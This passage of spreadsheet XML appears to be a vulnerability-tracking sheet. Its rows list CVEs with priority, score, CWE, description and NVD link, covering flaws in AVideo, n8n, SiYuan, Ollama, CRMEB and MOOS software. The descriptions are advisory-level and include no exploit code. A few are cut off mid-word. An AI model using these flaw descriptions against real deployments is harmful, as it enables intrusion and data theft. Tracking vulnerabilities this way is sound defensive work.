      <c r="C1288" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1288" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1288" s="5" t="inlineStr"/>
      <c r="F1288" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1288" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H1288" s="5" t="inlineStr"/>
      <c r="I1288" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1288" s="5" t="inlineStr"/>
      <c r="K1288" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1288" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo contains a SQL injection vulnerability in the sort column parameter of the get.json.php endpoint with APIName=channels that allows unauthenticated attackers to order results by arbitrary database columns including users.password and users.recoverPass. Attackers can exploit this ordering oracle to infer password hash values and recovery tokens, and trigger SQL errors that disclose the full query statement and database schema.</t>
        </is>
      </c>
      <c r="M1288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85155</t>
        </is>
      </c>
    </row>
    <row r="1289">
      <c r="A1289" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85169</t>
        </is>
      </c>
      <c r="C1289" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1289" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1289" s="5" t="inlineStr"/>
      <c r="F1289" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1289" s="5" t="inlineStr"/>
      <c r="H1289" s="5" t="inlineStr"/>
      <c r="I1289" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1289" s="5" t="inlineStr"/>
      <c r="K1289" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1289" s="5" t="inlineStr">
        <is>
          <t>n8n versions before 1.123.73, 2.35.4, and 2.36.2 contain an expression sandbox escape in the $fromAI handler. $fromAI resolved a caller-supplied placeholder name without requiring it to be an own property and admitted reserved keys; against a primitive input value it returned a live host-prototype reference. An attacker with workflow-build privilege can walk the prototype chain to the Function constructor and compile/execute arbitrary code in the main n8n process, leading to remote code execution.</t>
        </is>
      </c>
      <c r="M1289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85169</t>
        </is>
      </c>
    </row>
    <row r="1290">
      <c r="A1290" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85174</t>
        </is>
      </c>
      <c r="C1290" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1290" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1290" s="5" t="inlineStr"/>
      <c r="F1290" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1290" s="5" t="inlineStr"/>
      <c r="H1290" s="5" t="inlineStr"/>
      <c r="I1290" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1290" s="5" t="inlineStr"/>
      <c r="K1290" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L1290" s="5" t="inlineStr">
        <is>
          <t>SiYuan before v3.8.2 logs API tokens from query parameters in plaintext to an accessible log file when full-text search requests exceed timing thresholds. Authenticated attackers can read the log file via the getFile endpoint to recover admin API tokens and gain permanent administrative access.</t>
        </is>
      </c>
      <c r="M1290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85174</t>
        </is>
      </c>
    </row>
    <row r="1291">
      <c r="A1291" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85175</t>
        </is>
      </c>
      <c r="C1291" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1291" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1291" s="5" t="inlineStr"/>
      <c r="F1291" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1291" s="5" t="inlineStr"/>
      <c r="H1291" s="5" t="inlineStr"/>
      <c r="I1291" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1291" s="5" t="inlineStr"/>
      <c r="K1291" s="5" t="inlineStr">
        <is>
          <t>CWE-552</t>
        </is>
      </c>
      <c r="L1291" s="5" t="inlineStr">
        <is>
          <t>SiYuan versions &lt;= 3.8.1 (fixed in v3.8.2) contain an incomplete blocklist in the IsForbiddenAbsPath() function (kernel/util/path_guard.go), which only blocks conf/conf.json by exact match and does not restrict the TLS private key (conf/key.pem) or CA private key (conf/ca.key) stored in the same conf/ directory. Because the getFile handler skips the blocklist for RoleAdministrator and all authenticated users receive RoleAdministrator in v3.8.1, any user (or any client on a default no-auth-code instance) can retrieve these private keys via POST /api/file/getFile. On deployments with TLS enabled, this allows decryption of captured HTTPS traffic (key.pem) and forging of certificates trusted by clients that imported SiYuan's CA (ca.key).</t>
        </is>
      </c>
      <c r="M1291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85175</t>
        </is>
      </c>
    </row>
    <row r="1292">
      <c r="A1292" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85180</t>
        </is>
      </c>
      <c r="C1292" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1292" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1292" s="5" t="inlineStr"/>
      <c r="F1292" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1292" s="5" t="inlineStr"/>
      <c r="H1292" s="5" t="inlineStr"/>
      <c r="I1292" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1292" s="5" t="inlineStr"/>
      <c r="K1292" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1292" s="5" t="inlineStr">
        <is>
          <t>Ollama fails to validate redirect destinations when pulling tensor-layer models, allowing unauthenticated attackers to redirect blob downloads to arbitrary hosts. An attacker can control a registry, serve a malicious tensor-layer manifest, and cause the server to issue GET requests to internal hosts including cloud metadata endpoints.</t>
        </is>
      </c>
      <c r="M1292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85180</t>
        </is>
      </c>
    </row>
    <row r="1293">
      <c r="A1293" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85212</t>
        </is>
      </c>
      <c r="C1293" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1293" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1293" s="5" t="inlineStr"/>
      <c r="F1293" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1293" s="5" t="inlineStr"/>
      <c r="H1293" s="5" t="inlineStr"/>
      <c r="I1293" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1293" s="5" t="inlineStr"/>
      <c r="K1293" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1293" s="5" t="inlineStr">
        <is>
          <t>CRMEB contains an authentication bypass vulnerability in the verifyAuth() method of SystemRoleServices.php that returns true from both conditional branches. Sub-administrators and accounts with no roles can access restricted admin endpoints by exploiting the inert role check that always permits requests.</t>
        </is>
      </c>
      <c r="M1293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85212</t>
        </is>
      </c>
    </row>
    <row r="1294">
      <c r="A1294" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85429</t>
        </is>
      </c>
      <c r="C1294" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1294" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1294" s="5" t="inlineStr"/>
      <c r="F1294" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1294" s="5" t="inlineStr"/>
      <c r="H1294" s="5" t="inlineStr"/>
      <c r="I1294" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1294" s="5" t="inlineStr"/>
      <c r="K1294" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="L1294" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP uFldNodeComms through 24.8.1 trusts the source node identity from the message body rather than validating it from the connection source. Attackers can craft NODE_MESSAGE packets with spoofed source identities to impersonate other nodes and post arbitrary variable notifications without validation.</t>
        </is>
      </c>
      <c r="M1294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85429</t>
        </is>
      </c>
    </row>
    <row r="1295">
      <c r="A1295" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85431</t>
        </is>
      </c>
      <c r="C1295" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1295" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1295" s="5" t="inlineStr"/>
      <c r="F1295" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="G1295" s="5" t="inlineStr"/>
      <c r="H1295" s="5" t="inlineStr"/>
      <c r="I1295" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1295" s="5" t="inlineStr"/>
      <c r="K1295" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="L1295" s="5" t="inlineStr">
        <is>
          <t>MOOS essential-moos through version 10.0.1 contains an unauthenticated UDP packet injection vulnerability in pMOOSBridge when configured with UDPListen. Attackers can send crafted UDP packets to the configured port to inject arbitrary variables into the local MOOS community with spoofed source and community identifiers.</t>
        </is>
      </c>
      <c r="M1295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85431</t>
        </is>
      </c>
    </row>
    <row r="1296">
      <c r="A1296" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85436</t>
        </is>
      </c>
      <c r="C1296" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1296" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1296" s="5" t="inlineStr"/>
      <c r="F1296" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G1296" s="5" t="inlineStr"/>
      <c r="H1296" s="5" t="inlineStr"/>
      <c r="I1296" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1296" s="5" t="inlineStr"/>
      <c r="K1296" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="L1296" s="5" t="inlineStr">
        <is>
          <t>MOOS essential-moos through 10.0.1 contains a buffer overflow vulnerability in CMOOSUDPLink::ReadPktFromArray() that allows remote attackers to corrupt heap memory by sending UDP datagrams with negative declared lengths. Attackers can send crafted UDP packets to the configured UDPListen port to trigger an oversized memcpy operation that writes past the destination buffer, causing heap corruption and denial of service.</t>
        </is>
      </c>
      <c r="M1296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85436</t>
        </is>
      </c>
    </row>
    <row r="1297">
      <c r="A1297" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85441</t>
        </is>
      </c>
      <c r="C1297" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1297" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1297" s="5" t="inlineStr"/>
      <c r="F1297" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1297" s="5" t="inlineStr"/>
      <c r="H1297" s="5" t="inlineStr"/>
      <c r="I1297" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1297" s="5" t="inlineStr"/>
      <c r="K1297" s="5" t="inlineStr">
        <is>
          <t>CWE-195</t>
        </is>
      </c>
      <c r="L1297" s="5" t="inlineStr">
        <is>
          <t>MOOS core-moos through 10.4.0 fails to validate that serialized string lengths are non-negative in CMOOSMsg::operator&gt;&gt;. Unauthenticated attackers can send a crafted message with a negative length value to the MOOSDB port, causing an unhandled exception that terminates the database process.</t>
        </is>
      </c>
      <c r="M1297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85441</t>
        </is>
      </c>
    </row>
    <row r="1298">
      <c r="A1298" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85442</t>
        </is>
      </c>
      <c r="C1298" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1298" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1298" s="5" t="inlineStr"/>
      <c r="F1298" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1298" s="5" t="inlineStr"/>
      <c r="H1298" s="5" t="inlineStr"/>
      <c r="I1298" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1298" s="5" t="inlineStr"/>
      <c r="K1298" s="5" t="inlineStr">
        <is>
          <t>CWE-789</t>
        </is>
      </c>
      <c r="L1298" s="5" t="inlineStr">
        <is>
          <t>MOOS core-moos through 10.4.0 fails to validate packet length declarations in CMOOSCommPkt::OnBytesWritten(), allowing unauthenticated attackers to trigger unbounded buffer allocation by sending crafted wire packets. Attackers can send packets with large declared lengths to exhaust server memory and cause denial of service before client authentication completes.</t>
        </is>
      </c>
      <c r="M1298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85442</t>
        </is>
      </c>
    </row>
    <row r="1299">
      <c r="A1299" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85443</t>
        </is>
      </c>
      <c r="C1299" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1299" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1299" s="5" t="inlineStr"/>
      <c r="F1299" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1299" s="5" t="inlineStr"/>
      <c r="H1299" s="5" t="inlineStr"/>
      <c r="I1299" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1299" s="5" t="inlineStr"/>
      <c r="K1299" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L1299" s="5" t="inlineStr">
        <is>
          <t>MOOS core-moos through 10.4.0 contains a denial of service vulnerability in MOOSCommServer::ListenLoop() where the accept thread performs a blocking receive without timeout during the wire-protocol handshake. An attacker can open a TCP connection to the MOOSDB port and send no data, causing the accept thread to block indefinitely while holding the socket-list lock, preventing all subsequent client connections.</t>
        </is>
      </c>
      <c r="M1299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85443</t>
        </is>
      </c>
    </row>
    <row r="1300">
      <c r="A1300" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85444</t>
        </is>
      </c>
      <c r="C1300" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1300" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1300" s="5" t="inlineStr"/>
      <c r="F1300" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1300" s="5" t="inlineStr"/>
      <c r="H1300" s="5" t="inlineStr"/>
      <c r="I1300" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1300" s="5" t="inlineStr"/>
      <c r="K1300" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1300" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP t</t>
        </is>
      </c>
      <c r="M1300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85444</t>
        </is>
      </c>
    </row>
    <row r="1301">
      <c r="A1301" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85445</t>
        </is>
      </c>
      <c r="C1301" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1301" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1301" s="5" t="inlineStr"/>
      <c r="F1301" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1301" s="5" t="inlineStr"/>
      <c r="H1301" s="5" t="inlineStr"/>
      <c r="I1301" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1301" s="5" t="inlineStr"/>
      <c r="K1301" s="5" t="inlineStr">
        <is>
          <t>CWE-789</t>
        </is>
      </c>
      <c r="L1301" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP through 24.8.1 contains a denial of service vulnerability in the Demuxer::addMuxPacket() function that trusts the packet count declared in mux headers without validation. Attackers can declare arbitrarily large packet counts to trigger unbounded memory allocation, exhausting system resources and causing service unavailability.</t>
        </is>
      </c>
      <c r="M1301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85445</t>
        </is>
      </c>
    </row>
    <row r="1302">
      <c r="A1302" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85446</t>
        </is>
      </c>
      <c r="C1302" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1302" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1302" s="5" t="inlineStr"/>
      <c r="F1302" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1302" s="5" t="inlineStr"/>
      <c r="H1302" s="5" t="inlineStr"/>
      <c r="I1302" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1302" s="5" t="inlineStr"/>
      <c r="K1302" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L1302" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP versions through 24.8.1 contain a quadratic processing vulnerability in uFldNodeComms where each new node identity creates a ledger entry and triggers all-pairs distribution work. Attackers can supply unbounded distinct node names in reports to drive the shoreside broker into quadratic processing, delaying or preventing distribution of legitimate node reports.</t>
        </is>
      </c>
      <c r="M1302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85446</t>
        </is>
      </c>
    </row>
    <row r="1303">
      <c r="A1303" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85447</t>
        </is>
      </c>
      <c r="C1303" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1303" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1303" s="5" t="inlineStr"/>
      <c r="F1303" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1303" s="5" t="inlineStr"/>
      <c r="H1303" s="5" t="inlineStr"/>
      <c r="I1303" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1303" s="5" t="inlineStr"/>
      <c r="K1303" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1303" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP p</t>
        </is>
      </c>
      <c r="M1303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85447</t>
        </is>
      </c>
    </row>
    <row r="1304">
      <c r="A1304" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85448</t>
        </is>
      </c>
      <c r="C1304" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1304" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1304" s="5" t="inlineStr"/>
      <c r="F1304" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1304" s="5" t="inlineStr"/>
      <c r="H1304" s="5" t="inlineStr"/>
      <c r="I1304" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1304" s="5" t="inlineStr"/>
      <c r="K1304" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1304" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP uFldShoreBroker through 24.8.1 fails to limit the number of claimed communities stored in parallel vectors within ShoreBroker::handleMailNodePing(). A single publisher can supply unbounded distinct community names to grow retained state and per-pass work without limit, causing memory exhaustion and performance degradation.</t>
        </is>
      </c>
      <c r="M1304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85448</t>
        </is>
      </c>
    </row>
    <row r="1305">
      <c r="A1305" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85449</t>
        </is>
      </c>
      <c r="C1305" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1305" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1305" s="5" t="inlineStr"/>
      <c r="F1305" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1305" s="5" t="inlineStr"/>
      <c r="H1305" s="5" t="inlineStr"/>
      <c r="I1305" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1305" s="5" t="inlineStr"/>
      <c r="K1305" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1305" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP p</t>
        </is>
      </c>
      <c r="M1305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85449</t>
        </is>
      </c>
    </row>
    <row r="1306">
      <c r="A1306" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85450</t>
        </is>
      </c>
      <c r="C1306" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1306" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1306" s="5" t="inlineStr"/>
      <c r="F1306" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1306" s="5" t="inlineStr"/>
      <c r="H1306" s="5" t="inlineStr"/>
      <c r="I1306" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1306" s="5" t="inlineStr"/>
      <c r="K1306" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1306" s="5" t="inlineStr">
        <is>
          <t>MOOS core-moos through 10.4.0 contains a denial of service vulnerability in the MOOSDB HTTP server that creates unbounded connections and threads without limits. Attackers can open many connections and send endless header data to exhaust server threads and memory, causing service unavailability.</t>
        </is>
      </c>
      <c r="M1306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85450</t>
        </is>
      </c>
    </row>
    <row r="1307">
      <c r="A1307" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85452</t>
        </is>
      </c>
      <c r="C1307" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1307" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1307" s="5" t="inlineStr"/>
      <c r="F1307" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1307" s="5" t="inlineStr"/>
      <c r="H1307" s="5" t="inlineStr"/>
      <c r="I1307" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1307" s="5" t="inlineStr"/>
      <c r="K1307" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1307" s="5" t="inlineStr">
        <is>
          <t>MOOS ui-moos through 50b9c6c contains a buffer overflow vulnerability in ScopeTabPane.cpp and ScopeGrid.cpp where client and variable names are formatted into fixed 1024-byte buffers using sprintf without length validation. Attackers can supply arbitrarily long MOOS identifiers that overflow the buffers when an operator selects process list entries or pokes variables, enabling code execution.</t>
        </is>
      </c>
      <c r="M1307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85452</t>
        </is>
      </c>
    </row>
    <row r="1308">
      <c r="A1308" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85540</t>
        </is>
      </c>
      <c r="C1308" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1308" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1308" s="5" t="inlineStr"/>
      <c r="F1308" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1308" s="5" t="inlineStr"/>
      <c r="H1308" s="5" t="inlineStr"/>
      <c r="I1308" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1308" s="5" t="inlineStr"/>
      <c r="K1308" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1308" s="5" t="inlineStr">
        <is>
          <t>DreamMaker developed by Interinfo has a SQL Injection vulnerability. Authenticated remote attackers can inject arbitrary SQL commands to read, modify, and delete database contents.</t>
        </is>
      </c>
      <c r="M1308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85540</t>
        </is>
      </c>
    </row>
    <row r="1309">
      <c r="A1309" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85581</t>
        </is>
      </c>
      <c r="C1309" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1309" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1309" s="5" t="inlineStr"/>
      <c r="F1309" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1309" s="5" t="inlineStr"/>
      <c r="H1309" s="5" t="inlineStr"/>
      <c r="I1309" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1309" s="5" t="inlineStr"/>
      <c r="K1309" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1309" s="5" t="inlineStr">
        <is>
          <t>SiYuan before v3.8.2 contains a denial of service vulnerability in the unauthenticated /api/system/uiproc endpoint that accepts and retains attacker-controlled process identifiers without size limits or authentication. Attackers can send repeated requests with unique identifiers to exhaust process memory and degrade service availability.</t>
        </is>
      </c>
      <c r="M1309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85581</t>
        </is>
      </c>
    </row>
    <row r="1310">
      <c r="A1310" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85584</t>
        </is>
      </c>
      <c r="C1310" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1310" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1310" s="5" t="inlineStr"/>
      <c r="F1310" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1310" s="5" t="inlineStr"/>
      <c r="H1310" s="5" t="inlineStr"/>
      <c r="I1310" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1310" s="5" t="inlineStr"/>
      <c r="K1310" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
